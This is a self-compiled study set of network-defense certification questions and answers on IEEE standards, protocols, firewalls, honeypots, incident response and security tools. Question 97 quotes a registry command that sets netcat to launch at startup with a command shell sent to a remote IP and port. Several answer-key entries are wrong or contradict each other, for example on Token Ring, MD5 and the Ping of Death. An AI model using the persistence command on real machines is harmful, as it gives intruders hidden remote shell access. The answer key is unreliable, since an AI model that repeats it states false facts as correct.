Study CND

Question 1

What is the bit size of the Next Header field in the IPv6 header format?

Answer 1

8 Bits

Question 2

Which of the following is a presentation layer protocol?
A. TCP
B. RPC
C. BGP
D. LWAPP

Answer 2

Answer: D

LWAPP

Question 3

What IEEE standard is Fast Basic Service Set Transition? And what does it do?

Answer 3

802.11r is the standard to permit continuous connectivity aboard wireless devices in motion, with fast and secure handoffs from one base station to another, managed in a seamless manner.

Question 4

__________ is a congestion control mechanism that is designed for unicast flows operating in an Internet environment and competing with TCP traffic?

Answer 4

TCP Friendly Rate Control

Question 5

What is the IEEE-SA for wireless personal area networks?

Answer 5

802.15

Question 6

Which layer performs routing of IP datagrams?

Answer 6

Internet Layer

Question 7

Which of the following layers performs routing of IP datagrams?
A. Transport layer
B. Link layer
C. Application layer
D. Internet layer

Answer 7

Internet layer

Answer: D

Question 8

Which of the following standards defines Logical Link Control (LLC)?
A. 802.2
B. 802.3
C. 802.5
D. 802.4

Answer 8

802.2

Answer: A

Question 9

Which of the following protocols supports source-specific multicast (SSM)?
A. DHCP
B. ARP
C. DNS
D. BGMP

Answer 9

BGMP

Answer: D

Question 10

Token Ring is standardized by which of the following IEEE standards?
A. 802.2
B. 802.4
C. 802.3
D. 802.1

Answer 10

802.4 is the standard for Token Ring

Answer: B

Question 11

Which of the following is an example of a network providing DQDB access methods?
A. IEEE 802.3
B. IEEE 802.2
C. IEEE 802.4
D. IEEE 802.6

Answer 11

802.6 - Local and Metropolitan Area Networks: Distributed Queue Dual Bus (DQDB) Subnetwork of a Metropolitan Area Network (MAN)

Answer: D

Question 12

Which of the following IEEE standards defines the demand priority access method?
A. 802.15
B. 802.3
C. 802.12
D. 802.11

Answer 12

802.12

Answer: C

has to do with 100 Mbit Wifi on demand access. Probably not on the test. MAN

Question 13

Which of the following IEEE standards adds QoS features and multimedia support?
A. 802.11b
B. 802.11e
C. 802.5
D. 802.11a

Answer 13

802.11e

Answer: B

Question 14

Which of the following OSI layers is sometimes called the syntax layer?

Answer 14

Presentation layer

Question 15

Which of the following IEEE standards defines the token passing ring topology?
A. 802.4
B. 802.5
C. 802.3
D. 802.7

Answer 15

802.5

Answer: B

Question 16

Which of the following IEEE standards defines a physical bus topology?
A. 802.4
B. 802.5
C. 802.6
D. 802.3

Answer 16

802.4

Answer: A

Question 17

Which of the following fields in the IPv6 header replaces the TTL field in the IPv4 header?
A. Next header
B. Traffic class
C. Hop limit
D. Version

Answer 17

Hop Limit

Answer: C

Question 18

What is the response of an Xmas scan if a port is either open or filtered?
A. RST
B. No response
C. FIN
D. PUSH

Answer 18

NO Response

Answer: B

Question 19

CSMA/CD is specified in which IEEE standard?

Answer 19

802.3

Question 20

Which of the following protocols sends a jam signal when a collision is detected?

Answer 20

CSMA/CD

Question 21

Which of the following protocols is used in wireless networks?
A. CSMA
B. CSMA/CD
C. ALOHA
D. CSMA/CA

Answer 21

CSMA/CA

Answer: D

Question 22

TCP SYN scanning is also known as

Answer 22

half-open scanning

Question 23

You are a professional Computer Hacking forensic investigator. You have been called to collect
evidences of buffer overflow and cookie snooping attacks. Which of the following logs will you
review to accomplish the task?
A. Program logs
B. Web server logs
C. Event logs
D. System logs

Answer 23

A. Program logs

C. Event logs
D. System logs

Answer: D, C, and A

Question 24

Jason diagnoses the internals of his computer and observes that some changes have
been made in Sam’s computer registry. To rectify the issue, Jason has to restore the registry. Which of
the following utilities can Jason use to accomplish the task? Each correct answer represents a
complete solution. Choose all that apply.
A. Reg.exe
B. EventCombMT
C. Regedit.exe
D. Resplendent registrar

Answer 24

A. Reg.exe

C. Regedit.exe
D. Resplendent registrar

Question 25

The Distance Vector Multicast Routing Protocol (DVMRP) is used to …

Answer 25

share information between routers to transport IP Multicast packets among networks.

Question 26

______________ is an enumeration technique used to glean information about computer systems
on a network and the services running its open ports.

Answer 26

Banner Grabbing

Question 27

The Data Link Switching Client Access Protocol (DCAP) is an application layer
protocol that is used between workstations and routers for

Answer 27

transporting SNA/NetBIOS traffic over

TCP sessions.

Question 28

Honeynet is a prime example of

Answer 28

a high-interaction honeypot.

Question 29

Two or more honeypots on a network

form a

Answer 29

honeynet.

Question 30

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary’s intelligence collection capabilities identified in the previous action?
A. Analysis of Threats
B. Application of Appropriate OPSEC Measures
C. Identification of Critical Information
D. Analysis of Vulnerabilities
E. Assessment of Risk

Answer 30

D. Analysis of Vulnerabilities

Analysis of Vulnerabilities: It includes examining each aspect of the planned operation to identify
OPSEC indicators that could reveal critical information and then comparing those indicators with the
adversary’s intelligence collection capabilities identified in the previous action

Question 31

Which of the following protocols is used for inter-domain multicast routing and natively supports
"source-specific multicast" (SSM)?
A. BGMP
B. DVMRP
C. OSPF
D. EIGRP

Answer 31

BGMP
BGMP stands for border gateway multicast protocol. It is used for inter-domain multicast routing and
natively supports “source-specific multicast” (SSM). In order to support “any-source multicast”
(ASM), BGMP builds shared trees for active multicast groups. This allows domains to build sourcespecific,
inter-domain, distribution branches where needed. BGMP uses TCP as its transport protocol,
which helps in eliminating the need to implement message fragmentation, retransmission,
acknowledgement, and sequencing.

Question 32

What did the 802.11e enhancement to 802.a and 802.b provide?

Answer 32

QOS prioritization of voice data video transmissions

Question 33

Which of the OSI Seven Layers establishes, manages terminates connections between local and remote applications.

Answer 33

Session

Question 34

Which of the following are used as a cost estimating technique during the project planning
stage? Each correct answer represents a complete solution. Choose three.
A. Function point analysis
B. Program Evaluation Review Technique (PERT)
C. Expert judgment
D. Delphi technique

Answer 34

D. Delphi technique
C. Expert judgment
A. Function point analysis

Question 35

Which of the following IP class addresses are not allotted to hosts

Answer 35

Class D 224 - 239 reserved for multicasting

Class E 240 -255 experimental

Question 36

Which of the following IEEE standards provides specifications for wireless ATM systems?

Answer 36

802.11a

Question 37

Which of the following is the type of documented business rule for protecting information and the
systems, which store and process the information
A. Information protection policy
B. Information protection document
C. Information storage policy
D. Information security policy

Answer 37

Information security policy

Question 38

Which of the following UTP cables supports transmission up to 20MHz?
A. Category 2
B. Category 5e
C. Category 4
D. Category 1

Answer 38

Category 4

Question 39

Which of the following is also known as slag code?
A. Trojan
B. Logic bomb
C. Worm
D. IRC bot

Answer 39

Logic Bomb

Question 40

Which of the following is susceptible to a birthday attack?
A. Authentication
B. Integrity
C. Authorization
D. Digital signature

Answer 40

Digital Signature

Question 41

Which of the following wireless networks provides connectivity over distance up to 20 feet?
A. WMAN
B. WPAN
C. WLAN
D. WWAN

Answer 41

WPAN

Question 42

Which of the following networks interconnects devices centered on an individual person's
workspace?
A. WLAN
B. WPAN
C. WWAN
D. WMAN

Answer 42

WPAN

Question 43

Which of the following is a symmetric 64-bit block cipher that can support key lengths up to 448 bits?
A. HAVAL
B. BLOWFISH
C. IDEA
D. XOR

Answer 43

Blowfish

Question 44

Which of the following protocols is used to exchange encrypted EDI messages via email?
A. S/MIME
B. MIME
C. HTTP
D. HTTPS

Answer 44

S/MIME

Question 45

Which of the following are provided by digital signatures?
A. Identification and validation
B. Authentication and identification
C. Integrity and validation
D. Security and integrity

Answer 45

Authentication and Validation

Question 46

Which of the following is a passive attack?
A. Unauthorized access
B. Traffic analysis
C. Replay attack
D. Session hijacking
Answer: B

Answer 46

Traffic Analysis

Question 47

Which of the following is a malicious program that looks like a normal program?
A. Impersonation
B. Worm
C. Virus
D. Trojan horse

Answer 47

Trojan Horse

Question 48

Which of the following is an IPSec protocol that can be used alone in combination with Authentication Header (AH)?
A. L2TP
B. PPTP
C. ESP
D. PPP

Answer 48

ESP

Encapsulating Security Payload protocol

Question 49

Which of the following attacks combines dictionary and brute force attacks?
A. Replay attack
B. Man-in-the-middle attack
C. Hybrid attack
D. Phishing attack

Answer 49

Hybrid Attack

Question 50

Which of the following attacks comes under the category of an active attack?
A. Replay attack
B. Wireless footprinting
C. Passive Eavesdropping
D. Traffic analysis

Answer 50

Replay Attack

Question 51

Which of the following encryption techniques do digital signatures use?
A. MD5
B. RSA
C. Blowfish
D. IDEA

Answer 51

MD5

Question 52

Which of the following header fields in TCP/IP protocols involves Ping of Death attack?
A. SMTP header field
B. TCP header field
C. IP header field
D. UDP header field

Answer 52

TCP Header Field

Question 53

Which of the following modems offers wireless communication under water?
A. Controllerless modem
B. Short haul modem
C. Acoustic modem
D. Optical modem

Answer 53

Acoustic modem

Question 54

Which of the following protocols is used by the Remote Authentication Dial In User Service (RADIUS)
client/server protocol for data transmission?
A. DCCP
B. FTP
C. FCP
D. UDP

Answer 54

UDP

Question 55

Which of the following applications is used for the statistical analysis and reporting of the log files?
A. Sawmill
B. Sniffer
C. Snort
D. jplag

Answer 55

Sawmill

Question 56

Which of the following is a Cisco product that performs VPN and firewall functions?
A. Circuit-Level Gateway
B. PIX Firewall
C. IP Packet Filtering Firewall
D. Application Level Firewall

Answer 56

PIX Firewall

Question 57

Which of the following is also known as stateful firewall?
A. PIX firewall
B. Stateless firewall
C. DMZ
D. Dynamic packet-filtering firewall

Answer 57

Dynamic packet-filtering firewall

Question 58

Which of the following is a centralized collection of honeypots and analysis tools?
A. Production honeypot
B. Honeynet
C. Research honeypot
D. Honeyfarm

Answer 58

Honeyfarm

Question 59

Which of the following routing metrics is the sum of the costs associated with each link traversed?
A. Routing delay
B. Communication cost
C. Bandwidth
D. Path length

Answer 59

Path Length

Question 60

Which of the following honeypots is a useful little burglar alarm?
A. Backofficer friendly
B. Specter
C. Honeynet
D. Honeyd

Answer 60

Backofficer friendly

Question 61

What is the location of honeypot on a network?
A. Honeyfarm
B. Honeynet
C. Hub
D. DMZ

Answer 61

DMZ

Question 62

Which of the following is an open source implementation of the syslog protocol for Unix?
A. syslog-os
B. syslog Unix
C. syslog-ng
D. Unix-syslog

Answer 62

syslog-ng

Question 63

Which of the following protocols is a more secure version of the Point-to-Point Tunneling Protocol (PPTP) and provides tunneling, address assignment, and authentication?
A. IP
B. L2TP
C. PPP
D. DHCP

Answer 63

L2TP

Question 64

Which of the following sets of incident response practices is recommended by the CERT/CC?
A. Prepare, notify, and follow up
B. Notify, handle, and follow up
C. Prepare, handle, and notify
D. Prepare, handle, and follow up

Answer 64

Prepare, handle, and follow up

Question 65

Which of the following tools scans the network systems for well-known and often exploited
vulnerabilities?
A. Nessus
B. SAINT
C. SATAN
D. HPing

Answer 65

SATAN

Question 66

Which of the following tools examines a system for a number of known weaknesses and alerts the
administrator?
A. Nessus
B. COPS
C. SATAN
D. SAINT

Answer 66

COPS

Question 67

Which of the following is the full form of SAINT?
A. System Automated Integrated Network Tool
B. Security Admin Integrated Network Tool
C. System Admin Integrated Network Tool
D. System Administrators Integrated Network Tool

Answer 67

System Administrators Integrated Network Tool

Question 68

Which of the following is a type of VPN that involves a single VPN gateway?
A. Remote-access VPN
B. Extranet-based VPN
C. PPTP VPN
D. Intranet-based VPN

Answer 68

Extranet-based VPN

Question 69

Which of the following is a free security-auditing tool for Linux?
A. SAINT
B. SATAN
C. Nessus
D. HPing

Answer 69

Nessus

Question 70

Which of the following types of RAID is also known as disk striping?
A. RAID 0
B. RAID 2
C. RAID 1
D. RAID 3

Answer 70

RAID 0

Question 71

Which of the following is a process of transformation where the old system can no longer be
maintained?
A. Disaster
B. Risk
C. Threat
D. Crisis

Answer 71

Crisis

Question 72

Which of the following phases is the first step towards creating a business continuity plan?
A. Business Impact Assessment
B. Scope and Plan Initiation
C. Business Continuity Plan Development
D. Plan Approval and Implementation

Answer 72

Scope and Plan Initiation

Question 73

Which of the following types of RAID offers no protection for the parity disk?
A. RAID 2
B. RAID 1
C. RAID 5
D. RAID 3

Answer 73

RAID 3

Question 74

Which of the following processes helps the business units to understand the impact of a disruptive
event?
A. Plan approval and implementation
B. Business continuity plan development
C. Scope and plan initiation
D. Business impact assessment

Answer 74

Business impact assessment

Question 75

Which of the following is a network analysis tool that sends packets with nontraditional IP stack
parameters?
A. Nessus
B. COPS
C. SAINT
D. HPing

Answer 75

HPING

Question 76

Which of the following protocols is a method of implementing virtual private networks?
A. OSPF
B. PPTP
C. IRDP
D. DHCP

Answer 76

PPTP

Question 77

Which of the following attacks are computer threats that try to exploit computer application
vulnerabilities that are unknown to others or undisclosed to the software developer? Each correct
answer represents a complete solution. Choose all that apply.
A. Buffer overflow
B. Zero-day
C. Spoofing
D. Zero-hour

Answer 77

Zero Day
and
Zero Hour

Question 78

Which of the following is a service discovery protocol that allows computers and other devices to
find services in a local area network without prior configuration?
A. NTP
B. SLP
C. NNTP
D. DCAP

Answer 78

SLP

Service Location Protocol

Question 79

In L2TP ______________ tunnel mode, the ISP must

support L2TP, whereas in L2TP tunnel mode, the ISP does not need to support L2TP.

Answer 79

compulsory

Question 80

Which of the following tools examines a system for a number of known weaknesses and alerts the administrator?
SAINT
Nessus
SATAN
COPS

Answer 80

Should have chosen

COPS

Question 81

Which of the following routing metrics refers to the length of time that is required to move a packet from source to destination through the internetwork?

Bandwidth
Path length
Routing Delay
Load

Answer 81

Routing Delay

Question 82

Your company is outgrowing its current facility and plans to relocate within the next year. You need to provide management with guidance on selecting an appropriate new location. You are compiling a list of location considerations. Which is NOT a consideration.

proximity to roads
neighboring buildings
emergency exits
utility systems

Answer 82

emergency exits

Question 83

You are designing the site-to-site VPN topology. You want to connect all branches to the main office while preventing direct connections between branch offices. Which topology should you choose?

hub and spoke
star
mesh
ring

Answer 83

star

Question 84

You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company’s network. Which type of Internet access policy is currently implemented?

Paranoid
Prudent
Permissive
Promiscuous

Answer 84

Promiscuous

Question 85

Recently, an attacker was able to connect to a wireless access point as a client and eavesdrop on the traffic to obtain address information. Which type of wireless attack has occurred?

ad-hoc connection attack
AP MAC spoofing
misconfigured access point attack
evil twin attack

Answer 85

AP MAC spoofing

Question 86

In the process of evaluating the QoS features of VPN products, you become concerned with the ratio of data packets sent versus all packets. What is this called?

packet loss
Delay
Jitter
Goodput

Answer 86

Goodput

Question 87

You are using Nmap to perform a vulnerability assessment. Which of the following procedures would help to create a map of the network?	
ping sweep
Service discovery
port scan
OS fingerprinting

Answer 87

ping sweep

Question 88

Which of the following third party encryption tools can perform on the fly encryption (OTFE)?

Open Puff
AxCrypt
Wireshark
Veracrypt

Answer 88

Veracrypt

Question 89

You would like to connect your sniffer to a switch and capture all traffic going through the switch. Which of the following features could you use?

VTP
802.1q
DAI
RAP
STP
SPAN

Answer 89

RAP

SPAN

Question 90

During which stage of the IH&R process is a vulnerability analysis performed?

Eradication and Recover
Post-Incident Activities
Forensic Investigation
Containment

Answer 90

Eradication and Recover

Question 91

With which of the following flag sets does the Xmas tree scan send a TCP frame to a remote device?
Response:

RST
PUSH
FIN
URG

Answer 91

PUSH
FIN
URG

Question 92

Which of the following is the logical entity that enables programming code or software to operate in a virtualization solution?

Response:

virtual machine
hypervisor
execution environment
host operating system

Answer 92

execution environment

Question 93

What is the second phase in the vulnerability management process?

Remediation
Asset prioritization
Verification
Assessment

Answer 93

Asset prioritization

Question 94

Which of the following are the responsibilities of the disaster recovery team?

correct answer represents a complete solution. Choose all that apply.

To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts

To initiate the execution of the disaster recovery procedures

To monitor the execution of the disaster recovery plan and assess the results

To notify management, affected personnel, and third parties about the disaster

Answer 94

To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts

To initiate the execution of the disaster recovery procedures

To monitor the execution of the disaster recovery plan and assess the results

To notify management, affected personnel, and third parties about the disaster

Question 95

You are deploying a network IDS, and your main concern is to monitor surges in traffic that may indicate a DoS attack. Where should you place the sensors?

in the DMZ
on major backbones
on critical subnets
behind the external firewall

Answer 95

on major backbones

Question 96

Which wireless IPS will raise its risk indicator to 100% if an AP were discovered to be running with no encryption?

Answer 96

AirMobile Server

Question 97

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe”

What task do you want to perform by running this command?

Response:

You want to put Netcat in the stealth mode.
You want to set the Netcat to execute command any time.
You want to perform banner grabbing.
You want to add the Netcat command to the Windows registry.

Answer 97

You want to put Netcat in the stealth mode.
You want to set the Netcat to execute command any time.
You want to add the Netcat command to the Windows registry.

Question 98

Management is concerned that your Linux email server can become the victim of a DoS attack. Which of the following hardening recommendations will help reduce this possibility?

Use DNSBL servers.
Activate SPF.
Configure reverse DNS lookup.
Limit the number of connections.

Answer 98

Limit the number of connections.

Question 99

Management is concerned that an attacker will be able to access the /etc/shadow password file on a Linux server. When the Linux server was installed, the default permissions for this file were used. For this reason, you are not concerned.

What are the default permissions for this file?

500
400
600
700

Answer 99

400

Question 100

You may need to know how to change permissions in numeric code in Linux, so to do this you use numbers instead of “r”, “w”, or “x”.

What are the eight permission combinations of Owner, Group, User

0 = No Permission
1 = Execute
2 = Write
4 = Read

Answer 100

Permission numbers are:

0 = ---
1 = --x
2 = -w-
3 = -wx
4 = r-
5 = r-x
6 = rw-
7 = rwx

example
chmod 744

Question 101

Which of the following protocols is used for exchanging routing information between two gateways in a network of autonomous systems?

IGMP
EGP
OSPF
ICMP

Answer 101

OSPF

Question 102

Which of the following functions becomes possible when using quantitative risk analysis?

risk elimination
cost/benefit analysis
risk prioritization
risk identification

Answer 102

Cost/Benefit analysis

Question 103

Which of the following standards does a cloud service provider has to comply with, to protect the privacy of its customer’s personal information?

ISO/IEC 27020
ISO/IEC 27021
ISO/IEC 27018
ISO/IEC 27019

Answer 103

ISO/IEC 27018

Question 104

Which group in ISO/IEC 27001 includes communications security controls?

Response:

A.6

A.15

A.5

A.13

Answer 104

A.13

Question 105

Which wireless discovery tool uses the Windows command netsh wlan show networks mode=bssid to get wireless information?

NetStumbler
Vistumbler
InSSIDer
NetSurveyor

Answer 105

Vistumbler

Question 106

Business Coninuity Plan

Answer 106

provides measures for sustaining essential business operations while recovering from significant disruption

Question 107

Business Recovery Plan

Answer 107

provides measures for recovering business operations immediately following a disaster

Question 108

Continuity of Operation plan

Answer 108

provides measures and capabilities to maintain organizational essential, strategic functions at an alternate site for up to 30 days

Question 109

It provides measures and capabilities for recovering a major application or general support system.

Answer 109

Contingency Plan

Question 110

It provides measures for disseminating status report to personnel and the public

Answer 110

Crisis Commuication Disaster recovery planPlan

Question 111

It provides detailed measures to facilitate recovery of capabilities at an alternate site.

Answer 111

Disaster recovery plan

Question 112

What are the three layers of computer network defense (CND)?

people, assets, and technology
assets, operations, and technology
people, operations, and technology
people, operations, and assets

Answer 112

people, operations, and technology

Question 113

In which phase of the NIST Risk Management framework are security controls tailored to the needs of the organization?

Authorize
Select
Categorize
Monitor

Answer 113

Select

Question 114

Which of the following is a maintenance protocol that permits routers and host computers to swap basic control information when data is sent from one computer to another?

BGP
ICMP
SNMP
IGMP

Answer 114

ICMP

Question 115

You are assessing security needs for several hosts according to their purpose in the network. Which of the following factors would NOT affect security considerations for the hosts?

network services provided by the host
category of information stored on the host
operating system of the host
security requirements needed for information

Answer 115

operating system of the host

Question 116

Which sniffing tool is a command-line tool?

Dsniff
Capsa
Tcpdump
ColaSoft

Answer 116

tcpdump

Question 117

Sally needs to encrypt a document so that only Bob can decrypt it. What key should she use for this?

Bob’s public key
Sally’s public key
Sally’s private key
Bob’s private key

Answer 117

Bob’s Public Key

Question 118

Which of the following is true of security policies and baselines?

Security policies define the structure of the baseline.
Baselines define the structure of the security policy.
Policies are specific to the operating system.
Baselines are not specific to the operating system.

Answer 118

Baselines define the structure of the security policy

Question 119

Which of the following is NOT an IDS system?

Peek and Spy
Snort
Vanguard Enforcer
KFSensor

Answer 119

KFSensor (windows IPS)

Question 120

Identify the firewall technology that monitors the TCP handshake between the packets to determine whether a requested session is legitimate.

Packet Filtering Firewall
Circuit Level Gateway
Stateful Multilayer Inspection
Network Address Translation

Answer 120

Circuit Level Gateway

Question 121

During IH&R, the____________and containment processes can run at the same time.

Solution :

forensic analysis or forensic investigation

Determine whether the given solution is correct?

Response:

Correct
OR ?
Incorrect

Answer 121

correct

Question 122

During which phase of the vulnerability management process are rogue devices typically discovered?

Asset Prioritization
Discovery
Reporting
Assessment

Answer 122

Discovery

Question 123

Which of the following does NOT occur during the Post-incident Activity stage of IH&R?

Perform a damage assessment and document incident costs.
Update the incident handling policy.
Return the affected system to normal operation.

Answer 123

Return the affected system to normal operation.

Question 124

In which of the following levels of vulnerability management does scanning occur?

Assessment
Discovery
Asset prioritization
Remediation

Answer 124

Assessment

Question 125

At what layer of the OSI model do packet-filtering firewalls operate?

Layers 2 and 3
Layers 4 and 5
Layers 5 and 6
Layers 3 and 4

Answer 125

Layers 3 and 4

Question 126

Which of the following is a standard-based protocol that provides the highest level of VPN security?

PPP
IPSec
L2TP
IP

Answer 126

IPSec

Question 127

Which of the following forensic investigation roles examines the evidence acquired and determines what is useful to the investigation?

incident analyser
expert witness
evidence manager
evidence investigator

Answer 127

evidence investigator

Question 128

Which of the following should the first responder document prior to escalating an incident?

handling procedures
data about the affected system
containment actions
IRT contact information

Answer 128

data about the affected system

Question 129

Your sniffer just detected one device sending another a packet with the SYN flag set in the TCP header. What flags would you expect to be set in the packet the receiving device sends back to the sender?

SYN
ACK
SYN and ACK
RST

Answer 129

SYN and ACK

Question 130

Which tool ensures integrity of system files though the use of a cron job?

Trustwave
Tripwire
Code Green Networks TrueDLP
McAfee Total Protection for Data Loss

Answer 130

Tripwire

Question 131

Which policy defines the data sensitivity labels and the guidelines for processing, storing, and transmitting sensitive data?

acceptable use policy
network connection policy
information protection policy
information system security policy

Answer 131

information protection policy

Question 132

Which of the following firewalls are used to track the state of active connections and determine the network packets allowed to enter through the firewall?

Each correct answer represents a complete solution. Choose all that apply.

Dynamic packet-filtering
Stateful
Proxy server
Circuit-level gateway

Answer 132

Dynamic packet-filtering and

Statefull

Question 133

The Tripwire tool is used for what function?

file integrity verification
intrusion detection
data loss prevention
log collection

Answer 133

file integrity verification

Question 134

Which phase of vulnerability management deals with the actions for patching the discovered vulnerabilities?

Verification
Mitigation
Remediation
Assessment

Answer 134

Remediation

Question 135

Which of the following is a mandatory password-based and key-exchange authentication protocol?

DH-CHAP
PPP
CHAP
VRRP

Answer 135

DH-CHAP

Question 136

You use the following filter in Wireshark:

(tcp.flags==0x02) && (tcp.window_size <1025)

What type of traffic is the filter trying to locate?

TCP ACK scans
TCP SYN scans
OS fingerprinting
TCP SYN ACK packets

Answer 136

OS fingerprinting

Question 137

Which of the following IDS tools performs packet filtering using Berkeley Packet Filtering commands?

AIDE
SNARE
Vanguard Enforcer
Snort

Answer 137

Snort

Question 138

Your company recently implemented an internal public key infrastructure (PKI). Because you need to ensure that all of the PKI components are secure, you are currently researching the vulnerabilities of the entity that signs the certificates.

Which entity are you examining?

a principal
a verifier
an issuer
a subject

Answer 138

an issuer

Question 139

Which of the following is NOT a suspicious TCP packet?

one with only the SYN flag set and data
one with the SYN and FIN flags set
one with the destination port of zero
one with only the SYN flag set and no data

Answer 139

one with only the SYN flag set and no data

Question 140

Which of the following tools is used to ping a given range of IP addresses and resolve the host name of the remote system?

Nmap
SuperScan
Netscan
Hping

Answer 140

Superscan

Question 141

Your company decides to implement a new wireless network for employees who use mobile devices. You have been asked to determine which wireless deployment will provide the fastest throughput. Which of the following should you recommend?

802. 11g
803. 11ac
804. 11n
805. 11ad

Answer 141

802.11ad

Question 142

Which Wi-Fi discovery tool is built specifically for the Apple MAC OS?

Aircheck Wi-Fi tester
Xirrus -Fi Inspector
AirRadar 2
Wellenreiter

Answer 142

AirRadar 2

Question 143

Your company implements an authentication mechanism on their website whereby customers need to enter the hidden letters in a distorted image to confirm their identity. Which type of knowledge factor authentication is being used?

PIN
challenge response
Passphrase
security question

Answer 143

Challenge Response

Question 144

What is the third step in the patch management process?

Assess
Deploy
Detect
Acquire

Answer 144

Acquire

Question 145

Which of the following can only be done with an asymmetric algorithm?

data integrity
digital signature
generate hash values
data encryption

Answer 145

digital signature

Question 146

Which of the following statements are NOT true about the FAT16 file system?

correct answer represents a complete solution. Choose all that apply.

It does not support file-level security.
It supports file-level compression.
It works well with large disks because the cluster size increases as the disk partition size increases.
It supports the Linux operating system.

Answer 146

It supports file-level compression.

It works well with large disks because the cluster size increases as the disk partition size increases.

Question 147

During which stage of the IH&R process is a vulnerability analysis performed?

Post-Incident Activities
Eradication and Recover
Forensic Investigation
Containment	
Eradication and Recover

Answer 147

Eradication and Recover

Question 148

Which of the following protocols is used to share information between routers to transport IP Multicast packets among networks?

Response:

LWAPP
DVMRP
RSVP
RPC

Answer 148

DVMRP

Distance Vector Multicast Routing Protocol

Question 149

Which of the following is true of content-based signatures?

Response:

Signatures are in packet payloads.
Signatures are in packet headers.
Packet analysis is enough to detect signatures.
Multiple packet analysis is required.

Answer 149

Signatures are in packet payloads.

Question 150

Which computer network defense (CND) approach examines the root cause or reasons for network attacks?

detective approach
retrospective approach
preventive approach
reactive approach

Answer 150

Should have chosen

retrospective appoach

Question 151

Which of the following is a Unix and Windows tool capable of intercepting traffic on a network segment and capturing username and password?

Aircrack
Ettercap
BackTrack
AirSnort

Answer 151

Ettercap

Question 152

You are reviewing your company’s application development policies. Which of the following should NOT be part of this?

Use standard application configuration baselines during development.

Implement secure coding review.
Ensure only authorized personnel can install software on all hosts.
Use standard secure coding practices and principles during development.

Answer 152

Use standard application configuration baselines during development.

Question 153

You need to test the strength of the WPA PSK password used in your WLAN. Which tool could you use for this?

Net Surveyor
NetStumbler
Vistumbler
Wireless Security Auditor

Answer 153

Wireless Security Auditor

Question 154

You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company’s network. Which type of Internet access policy is currently implemented?

Permissive
Promiscuous
Paranoid
Prudent

Answer 154

Promiscuous

Question 155

Which of the following protocols uses a control channel over TCP and a GRE tunnel operating to encapsulate PPP packets?

PPTP
SSTP
ESP
LWAPP

Answer 155

PPTP

Question 156

Which of the following does NOT affect the severity of an incident?

service criticality
incident impact
incident duration
information confidentiality

Answer 156

information confidentiality

Question 157

Which of the following sniffers can operate on multi-network cards, such as ISDN and ADSL?

Dsniff
Capsa
ColaSoft Packet Sniffer
Colasoft Network Sniffer

Answer 157

Should have chosen

ColaSoft Packet Sniffer

Question 158

In which of the following transmission modes is communication uni-directional?

Full-duplex mode
Half-duplex mode
Root mode
Simplex mode

Answer 158

Simplex Mode

Question 159

You suspect an attacker recently performed a UDP scan of the network. You would like to look for traffic that would verify this. How should you set the filter in Wireshark?

icmp. type==3 and ICMP code==3
tcp. flags== 0x003
udp. dtspport==7
icmp. type==8

Answer 159

icmp.type==3 and ICMP code==3

Question 160

Which of the following is a network interconnectivity device that translates different communication protocols and is used to connect dissimilar network technologies?

Switch
Gateway
Bridge
Router

Answer 160

Gateway

Question 161

Which of the following is the primary international body for fostering cooperative standards for telecommunications equipment and systems?

IEEE
CCITT
ICANN
NIST

Answer 161

CCITT

Question 162

At which level of virtualization does SAN technology operate?

file system
storage device
Fabric
server

Answer 162

Fabric

Question 163

Which of the following recovery plans includes specific strategies and actions to deal with specific variances to assumptions resulting in a particular security problem, emergency, or state of affairs?

Contingency plan
Continuity of Operations Plan
Business continuity plan
Disaster recovery plan

Answer 163

Contingency plan

Question 164

Which of the risk management phases is the context in which the risk exists determined?

Risk treatment
Risk assessment
Risk monitoring and review
Risk identification

Answer 164

Risk Identification